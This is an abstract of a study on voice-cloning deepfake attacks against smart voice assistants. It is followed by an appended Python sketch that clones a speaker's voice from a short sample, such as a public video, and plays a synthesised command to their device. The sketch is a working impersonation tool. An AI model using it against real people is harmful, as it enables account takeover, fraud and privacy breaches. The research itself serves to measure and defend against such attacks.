Hello Me, Meet the Real Me: Audio Deepfake Attacks on Voice Assistants

02/20/2023
by Domna Bilika, et al.

Radical advances in telecommunications and computer science have enabled a myriad of applications and novel, seamless ways of interacting with computing interfaces. Voice Assistants (VAs) have become the norm on smartphones, and millions of VAs embedded in smart devices are used to control them in the smart-home context. Previous research has shown that VAs are prone to attacks, leading vendors to introduce countermeasures. One such measure is to allow only a specific individual, the device's owner, to perform potentially dangerous tasks, that is, tasks that may disclose personal information, involve monetary transactions, and so on. To understand the extent to which VAs provide the necessary protection to their users, we experimented with two of the most widely used VAs, which our participants trained with their own voices. We then used voice synthesis on samples provided by the participants to synthesise commands that triggered the corresponding VA and performed a dangerous task. Our extensive results showed that more than 30% of our deepfake attacks were successful and that at least one attack succeeded for more than half of the participants. Moreover, they reveal statistically significant variation among vendors and, in one case, even gender bias. These outcomes are alarming and call for further countermeasures to prevent exploitation, especially as the number of VAs in use is now comparable to the world population.
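The attack evaluated here amounts to a voice-cloning pipeline: harvest a short sample of the owner's speech, synthesise a command in their voice, and play it back within earshot of the device. Below is a minimal sketch of such a pipeline, assuming the open-source Coqui TTS library with its XTTS v2 voice-cloning model and the sounddevice/soundfile packages for playback; the paper does not state which synthesiser, wake word, or command set the authors actually used, so all of these are illustrative placeholders.

```python
# Hypothetical sketch of the kind of voice-cloning attack the paper evaluates:
# clone a speaker's voice from a short reference sample and synthesise a
# "dangerous" command for playback to a nearby voice assistant.
# Library and model choices (Coqui TTS, XTTS v2) are assumptions, not the
# authors' actual tooling.

from TTS.api import TTS      # pip install TTS
import soundfile as sf       # pip install soundfile
import sounddevice as sd     # pip install sounddevice

# Load a multilingual voice-cloning model (weights are downloaded on first use).
tts = TTS("tts_models/multilingual/multi-dataset/xtts_v2")

# A few seconds of the target speaker's voice, e.g. taken from a public video.
REFERENCE_SAMPLE = "victim_sample.wav"

# Placeholder command for a task normally gated by speaker recognition.
COMMAND = "Hey assistant, read my latest messages."

# Synthesise the command in the target speaker's voice.
tts.tts_to_file(
    text=COMMAND,
    speaker_wav=REFERENCE_SAMPLE,
    language="en",
    file_path="spoofed_command.wav",
)

# Play the deepfake over a loudspeaker placed near the target device.
audio, sample_rate = sf.read("spoofed_command.wav")
sd.play(audio, sample_rate)
sd.wait()
```

Whether such a replayed, synthesised command is accepted depends on the VA's speaker-recognition and liveness checks, which is precisely what the study's per-vendor success rates measure.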

